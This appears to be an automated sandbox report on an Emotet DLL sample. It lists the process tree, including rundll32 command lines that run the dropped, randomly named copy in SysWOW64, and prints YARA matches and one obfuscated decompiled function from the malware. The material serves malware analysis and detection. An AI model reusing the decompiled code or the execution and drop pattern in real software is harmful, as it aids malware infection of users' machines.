Start date:	01/08/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\sample.dll"
Imagebase:	0x3f0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.332283199.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.331704119.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.331683572.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.341884681.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.332269283.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.332361997.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.341860463.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.331772344.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3116, Parent PID: 5836

General

Target ID:	1
Start time:	13:42:06
Start date:	01/08/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\sample.dll",#1
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5828, Parent PID: 3116

General

Target ID:	2
Start time:	13:42:06
Start date:	01/08/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\sample.dll",#1
Imagebase:	0xd90000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.335758052.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.335476233.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.337892892.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 1108, Parent PID: 568

General

Target ID:	3
Start time:	13:42:29
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4772, Parent PID: 568

General

Target ID:	5
Start time:	13:42:44
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 260, Parent PID: 568

General

Target ID:	6
Start time:	13:42:46
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5660, Parent PID: 5828

General

Target ID:	8
Start time:	13:42:48
Start date:	01/08/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ttwabgporcdt\yyxjoravwnz.pba",iNIZBi
Imagebase:	0xd90000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.360786510.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.360804490.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.360909118.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 2788, Parent PID: 568

General

Target ID:	9
Start time:	13:42:48
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 5720, Parent PID: 5836

General

Target ID:	10
Start time:	13:42:49
Start date:	01/08/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 344
Imagebase:	0x2d0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 1028, Parent PID: 568

General

Target ID:	11
Start time:	13:42:52
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: SgrmBroker.exePID: 5232, Parent PID: 568

General

Target ID:	12
Start time:	13:42:53
Start date:	01/08/2022
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff7c02a0000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5652, Parent PID: 568

General

Target ID:	13
Start time:	13:42:54
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4368, Parent PID: 568

General

Target ID:	14
Start time:	13:42:55
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 1248, Parent PID: 568

General

Target ID:	15
Start time:	13:42:55
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 2776, Parent PID: 5660

General

Target ID:	16
Start time:	13:43:01
Start date:	01/08/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ttwabgporcdt\yyxjoravwnz.pba",#1
Imagebase:	0xd90000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.767352719.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.766565506.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.767779490.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5920, Parent PID: 568

General

Target ID:	18
Start time:	13:43:16
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: MpCmdRun.exePID: 2948, Parent PID: 4368

General

Target ID:	20
Start time:	13:43:57
Start date:	01/08/2022
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:	0x7ff7b0320000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1464, Parent PID: 2948

General

Target ID:	21
Start time:	13:43:57
Start date:	01/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 244, Parent PID: 568

General

Target ID:	22
Start time:	13:43:59
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5240, Parent PID: 568

General

Target ID:	26
Start time:	13:44:22
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5768, Parent PID: 568

General

Target ID:	29
Start time:	13:44:31
Start date:	01/08/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff73c930000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll32.exePID: 5836, Parent PID: 5308COMMON

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	13.3%
Signature Coverage:	53.8%
Total number of Nodes:	1023
Total number of Limit Nodes:	4

Executed Functions

Function 1001A0F1 Relevance: 20.4, Strings: 16, Instructions: 365
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E1001A0F1() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _t405;
				signed short* _t412;
				signed int* _t413;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t428;
				signed int* _t457;
				void* _t458;
				signed int _t462;
				signed short* _t465;
				signed int* _t466;

				_t466 =  &_v1732;
				_v1572 = 0x462649;
				_v1568 = 0x666e6d;
				_t413 = 0;
				_v1564 = 0;
				_v1636 = 0x6ea1;
				_v1636 = _v1636 | 0xcaeb1c54;
				_v1636 = _v1636 * 0x44;
				_t458 = 0x1c8a6667;
				_v1636 = _v1636 ^ 0xe68db93d;
				_v1700 = 0x9ea9;
				_v1700 = _v1700 << 0xa;
				_t462 = 0x2b;
				_t415 = 0x23;
				_v1700 = _v1700 * 0x64;
				_v1700 = _v1700 >> 0xc;
				_v1700 = _v1700 ^ 0x000f2063;
				_v1668 = 0xf2a5;
				_v1668 = _v1668 ^ 0x17163b96;
				_v1668 = _v1668 ^ 0xad5f2e4e;
				_v1668 = _v1668 ^ 0xba49bcd9;
				_v1624 = 0xe487;
				_v1624 = _v1624 | 0xeb9c80de;
				_v1624 = _v1624 ^ 0xeb9c9144;
				_v1592 = 0x3881;
				_v1592 = _v1592 * 0x6f;
				_v1592 = _v1592 ^ 0x0018105e;
				_v1724 = 0x49ba;
				_v1724 = _v1724 + 0xaf0;
				_v1724 = _v1724 / _t462;
				_v1724 = _v1724 << 6;
				_v1724 = _v1724 ^ 0x00003deb;
				_v1612 = 0xba93;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0x2ea4e5a5;
				_v1652 = 0x4b77;
				_v1652 = _v1652 | 0x65810647;
				_v1652 = _v1652 >> 4;
				_v1652 = _v1652 ^ 0x065805b9;
				_v1588 = 0xa186;
				_v1588 = _v1588 + 0xb5c;
				_v1588 = _v1588 ^ 0x0000a1c8;
				_v1680 = 0xcda8;
				_v1680 = _v1680 * 0x54;
				_v1680 = _v1680 << 0xa;
				_v1680 = _v1680 ^ 0x0deca729;
				_v1716 = 0x462e;
				_v1716 = _v1716 ^ 0x8d5a910e;
				_v1716 = _v1716 + 0xffff4390;
				_v1716 = _v1716 << 6;
				_v1716 = _v1716 ^ 0x56868d11;
				_v1708 = 0x2567;
				_v1708 = _v1708 << 0x10;
				_v1708 = _v1708 | 0xd57d8b4f;
				_v1708 = _v1708 >> 4;
				_v1708 = _v1708 ^ 0x0f57bf90;
				_v1604 = 0xb0f8;
				_v1604 = _v1604 + 0xffffeab4;
				_v1604 = _v1604 ^ 0x000092c0;
				_v1576 = 0x7d09;
				_v1576 = _v1576 << 1;
				_v1576 = _v1576 ^ 0x0000cf25;
				_v1656 = 0x9d96;
				_v1656 = _v1656 / _t415;
				_v1656 = _v1656 >> 4;
				_v1656 = _v1656 ^ 0x00003825;
				_v1728 = 0xae64;
				_v1728 = _v1728 >> 0x10;
				_t416 = 0x3c;
				_v1728 = _v1728 * 0x3d;
				_v1728 = _v1728 * 0x64;
				_v1728 = _v1728 ^ 0x0000360d;
				_v1672 = 0x87c;
				_v1672 = _v1672 * 0x4c;
				_v1672 = _v1672 | 0xb9377e8f;
				_v1672 = _v1672 ^ 0xb937fee9;
				_v1596 = 0x755f;
				_v1596 = _v1596 << 3;
				_v1596 = _v1596 ^ 0x0003dbc7;
				_v1580 = 0x3e57;
				_v1580 = _v1580 / _t416;
				_v1580 = _v1580 ^ 0x000011a5;
				_v1732 = 0x638d;
				_v1732 = _v1732 ^ 0xa21d193e;
				_v1732 = _v1732 ^ 0x99b9aab2;
				_v1732 = _v1732 << 0xa;
				_v1732 = _v1732 ^ 0x93405e44;
				_v1644 = 0x6fb3;
				_v1644 = _v1644 >> 0xe;
				_v1644 = _v1644 >> 0xa;
				_v1644 = _v1644 ^ 0x00001043;
				_v1584 = 0x2384;
				_v1584 = _v1584 | 0x2b24236c;
				_v1584 = _v1584 ^ 0x2b240980;
				_v1664 = 0xc490;
				_v1664 = _v1664 + 0xffffef59;
				_t417 = 0x46;
				_v1664 = _v1664 * 0x1f;
				_v1664 = _v1664 ^ 0x0015d474;
				_v1676 = 0x3daf;
				_v1676 = _v1676 * 0x74;
				_v1676 = _v1676 << 0x10;
				_v1676 = _v1676 ^ 0xf34c4f53;
				_v1684 = 0x7c37;
				_v1684 = _v1684 << 0x10;
				_v1684 = _v1684 ^ 0xee095b2d;
				_v1684 = _v1684 ^ 0x923e0ee4;
				_v1688 = 0xf4a0;
				_v1688 = _v1688 ^ 0x2a95b5f1;
				_v1688 = _v1688 | 0x3f378004;
				_v1688 = _v1688 ^ 0x3fb7c4e0;
				_v1720 = 0x3554;
				_v1720 = _v1720 + 0xcba6;
				_v1720 = _v1720 / _t417;
				_t418 = 0x29;
				_v1720 = _v1720 * 0x6e;
				_v1720 = _v1720 ^ 0x00018d2b;
				_v1692 = 0xb003;
				_v1692 = _v1692 * 0x21;
				_v1692 = _v1692 / _t418;
				_v1692 = _v1692 ^ 0x0000dafa;
				_v1608 = 0x9556;
				_v1608 = _v1608 << 6;
				_v1608 = _v1608 ^ 0x0025285b;
				_v1712 = 0x7c63;
				_v1712 = _v1712 + 0xd61;
				_v1712 = _v1712 | 0xf93ff987;
				_v1712 = _v1712 + 0xffff3f2f;
				_v1712 = _v1712 ^ 0xf93f3a22;
				_v1616 = 0xf4ab;
				_t419 = 6;
				_v1616 = _v1616 * 0x6e;
				_v1616 = _v1616 ^ 0x00690dca;
				_v1620 = 0x70bb;
				_v1620 = _v1620 + 0x70ef;
				_v1620 = _v1620 ^ 0x0000b67e;
				_v1704 = 0x2bc1;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 >> 8;
				_v1704 = _v1704 >> 5;
				_v1704 = _v1704 ^ 0x000077dd;
				_v1648 = 0x7a74;
				_v1648 = _v1648 + 0xffff7142;
				_v1648 = _v1648 + 0xffff0d10;
				_v1648 = _v1648 ^ 0xfffe8588;
				_v1660 = 0x319c;
				_v1660 = _v1660 / _t419;
				_v1660 = _v1660 + 0xffff3bc4;
				_v1660 = _v1660 ^ 0xffff411a;
				_v1632 = 0x6a97;
				_v1632 = _v1632 / _t462;
				_v1632 = _v1632 + 0xf6cf;
				_v1632 = _v1632 ^ 0x0000a388;
				_v1640 = 0x6bc7;
				_t420 = 0x28;
				_v1640 = _v1640 / _t420;
				_t421 = 0x51;
				_v1640 = _v1640 / _t421;
				_v1640 = _v1640 ^ 0x000021dd;
				_v1628 = 0x3b39;
				_v1628 = _v1628 | 0xa29391b9;
				_v1628 = _v1628 ^ 0xa293ed86;
				_v1600 = 0xe9c9;
				_v1600 = _v1600 + 0xffff6249;
				_v1600 = _v1600 ^ 0x000034d4;
				_v1696 = 0xf82d;
				_v1696 = _v1696 << 0xc;
				_v1696 = _v1696 + 0xffffa8ef;
				_t422 = 0x63;
				_t465 = _v1628;
				_v1696 = _v1696 / _t422;
				_v1696 = _v1696 ^ 0x002844a7;
				while(_t458 != 0x441c66b) {
					if(_t458 == 0x6f1be5d) {
						_push(0x100014a4);
						_push(_v1588);
						_push(_v1652);
						_t405 = E10007F4B( &_v1560, _v1680, E10005DFC(_v1724, _v1612, __eflags), _v1716, _v1708); // executed
						asm("sbb edi, edi");
						_t422 = _v1604;
						_t458 = ( ~_t405 & 0xd90426a5) + 0x2b3d9fc6;
						E10010D6D(_t422, _v1576, _v1656, _t404);
						_t466 =  &(_t466[8]);
						goto L20;
					} else {
						if(_t458 == 0x1c8a6667) {
							_t422 = _v1700;
							E10005755(_t422,  &_v1560, _v1668, _v1624, 0x208);
							_t466 =  &(_t466[3]);
							_t458 = 0x289b3cf5;
							continue;
						} else {
							if(_t458 == 0x289b3cf5) {
								_t465 = E10010DC5();
								_t458 = 0x3ab6a711;
								continue;
							} else {
								if(_t458 == 0x2c7788d8) {
									_push(_t413);
									_push(_t465);
									_push(_v1696);
									_push(_v1600);
									_push(_v1628);
									_push(_v1640);
									_push(_t413);
									_push(_t413);
									E10006417(_v1632, __eflags);
									_t413 = 1;
									__eflags = 1;
								} else {
									if(_t458 != 0x3ab6a711) {
										L20:
										__eflags = _t458 - 0x2b3d9fc6;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_t412 = _t465;
										if( *_t465 != _t413) {
											do {
												if( *_t412 == 0x2c) {
													_t457 =  &_v1560;
													while(1) {
														_t412 =  &(_t412[1]);
														_t428 =  *_t412 & 0x0000ffff;
														if(_t428 == 0) {
															break;
														}
														__eflags = _t428 - 0x20;
														if(__eflags != 0) {
															 *_t457 = _t428;
															_t457 =  &(_t457[0]);
															__eflags = _t457;
															continue;
														}
														break;
													}
													_t422 = 0;
													 *_t457 = 0;
												}
												_t412 =  &(_t412[1]);
											} while ( *_t412 != _t413);
										}
										_t458 = 0x6f1be5d;
										continue;
									}
								}
							}
						}
					}
					return _t413;
				}
				_push(_t422);
				E1000471A(_v1636,  &_v520, _v1728, _v1672, _v1596, _v1580, _v1732);
				E1000DFD8(_v1644,  &_v1040, __eflags, _v1584, _v1664);
				_push(0x100014d4);
				_push(_v1720);
				_push(_v1688);
				E1000A4D7(__eflags, _v1608, _v1712, _v1616, _v1620, E10005DFC(_v1676, _v1684, __eflags),  &_v520, _t465,  &_v1040);
				_t422 = _v1704;
				E10010D6D(_t422, _v1648, _v1660, _t399);
				_t466 =  &(_t466[0x17]);
				_t458 = 0x2c7788d8;
				goto L20;
			}

0x1001a0f1
0x1001a0f7
0x1001a104
0x1001a110
0x1001a112
0x1001a119
0x1001a121
0x1001a133
0x1001a137
0x1001a13c
0x1001a144
0x1001a14c
0x1001a156
0x1001a159
0x1001a15a
0x1001a15e
0x1001a163
0x1001a16b
0x1001a173
0x1001a17b
0x1001a183
0x1001a18b
0x1001a193
0x1001a19b
0x1001a1a3
0x1001a1b6
0x1001a1bd
0x1001a1c8
0x1001a1d0
0x1001a1e0
0x1001a1e4
0x1001a1e9
0x1001a1f1
0x1001a1fc
0x1001a204
0x1001a20f
0x1001a217
0x1001a21f
0x1001a224
0x1001a22c
0x1001a237
0x1001a242
0x1001a24d
0x1001a25a
0x1001a25e
0x1001a263
0x1001a26b
0x1001a273
0x1001a27b
0x1001a283
0x1001a288
0x1001a290
0x1001a298
0x1001a29d
0x1001a2a5
0x1001a2aa
0x1001a2b2
0x1001a2bd
0x1001a2c8
0x1001a2d3
0x1001a2de
0x1001a2e5
0x1001a2f0
0x1001a2fe
0x1001a302
0x1001a307
0x1001a30f
0x1001a319
0x1001a325
0x1001a328
0x1001a331
0x1001a335
0x1001a33d
0x1001a34a
0x1001a34e
0x1001a356
0x1001a35e
0x1001a369
0x1001a371
0x1001a37c
0x1001a392
0x1001a399
0x1001a3a4
0x1001a3ac
0x1001a3b4
0x1001a3bc
0x1001a3c1
0x1001a3c9
0x1001a3d1
0x1001a3d6
0x1001a3db
0x1001a3e3
0x1001a3ee
0x1001a3f9
0x1001a404
0x1001a40c
0x1001a419
0x1001a41c
0x1001a420
0x1001a428
0x1001a435
0x1001a439
0x1001a43e
0x1001a446
0x1001a44e
0x1001a453
0x1001a45b
0x1001a463
0x1001a46b
0x1001a473
0x1001a47b
0x1001a483
0x1001a48b
0x1001a49b
0x1001a4a4
0x1001a4a5
0x1001a4a9
0x1001a4b1
0x1001a4be
0x1001a4c8
0x1001a4cc
0x1001a4d4
0x1001a4df
0x1001a4e7
0x1001a4f2
0x1001a4fa
0x1001a502
0x1001a50a
0x1001a512
0x1001a51c
0x1001a531
0x1001a534
0x1001a53b
0x1001a546
0x1001a551
0x1001a55c
0x1001a567
0x1001a56f
0x1001a574
0x1001a579
0x1001a57e
0x1001a586
0x1001a58e
0x1001a596
0x1001a59e
0x1001a5a6
0x1001a5b6
0x1001a5ba
0x1001a5c2
0x1001a5ca
0x1001a5da
0x1001a5de
0x1001a5e6
0x1001a5ee
0x1001a5fa
0x1001a5ff
0x1001a609
0x1001a60e
0x1001a614
0x1001a61c
0x1001a624
0x1001a62c
0x1001a634
0x1001a63f
0x1001a64a
0x1001a655
0x1001a65d
0x1001a662
0x1001a66e
0x1001a671
0x1001a675
0x1001a679
0x1001a681
0x1001a693
0x1001a74b
0x1001a750
0x1001a757
0x1001a781
0x1001a796
0x1001a798
0x1001a7a5
0x1001a7ab
0x1001a7b0
0x00000000
0x1001a699
0x1001a69f
0x1001a735
0x1001a739
0x1001a73e
0x1001a741
0x00000000
0x1001a6a1
0x1001a6a7
0x1001a712
0x1001a714
0x00000000
0x1001a6a9
0x1001a6af
0x1001a883
0x1001a884
0x1001a885
0x1001a889
0x1001a890
0x1001a897
0x1001a8a5
0x1001a8a6
0x1001a8a7
0x1001a8b1
0x1001a8b1
0x1001a6b5
0x1001a6bb
0x1001a875
0x1001a875
0x1001a87b
0x00000000
0x00000000
0x1001a881
0x1001a6c1
0x1001a6c1
0x1001a6c7
0x1001a6c9
0x1001a6cd
0x1001a6cf
0x1001a6e4
0x1001a6e4
0x1001a6e7
0x1001a6ed
0x00000000
0x00000000
0x1001a6d8
0x1001a6dc
0x1001a6de
0x1001a6e1
0x1001a6e1
0x00000000
0x1001a6e1
0x00000000
0x1001a6dc
0x1001a6ef
0x1001a6f1
0x1001a6f1
0x1001a6f4
0x1001a6f7
0x1001a6c9
0x1001a6fc
0x00000000
0x1001a6fc
0x1001a6bb
0x1001a6af
0x1001a6a7
0x1001a69f
0x1001a8be
0x1001a8be
0x1001a7b8
0x1001a7e2
0x1001a800
0x1001a805
0x1001a80a
0x1001a80e
0x1001a850
0x1001a864
0x1001a868
0x1001a86d
0x1001a870
0x00000000

Strings

g%, xrefs: 1001A290
l#$+, xrefs: 1001A3EE
tz, xrefs: 1001A586
_u, xrefs: 1001A35E
%8, xrefs: 1001A307
6, xrefs: 1001A335
mnf, xrefs: 1001A104
[(%, xrefs: 1001A4E7
T5, xrefs: 1001A483
a, xrefs: 1001A4FA
p, xrefs: 1001A551
9;, xrefs: 1001A61C
-[, xrefs: 1001A453
I&F, xrefs: 1001A0F7
wK, xrefs: 1001A20F
W>, xrefs: 1001A37C

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6$%8$-[$9;$I&F$T5$W>$[(%$_u$a$g%$l#$+$mnf$tz$wK$p
API String ID: 0-3673879503
Opcode ID: 043c1465bbb069e7498e7776d98aa1155250e9bcbacd39a9879b6882dcaed79c
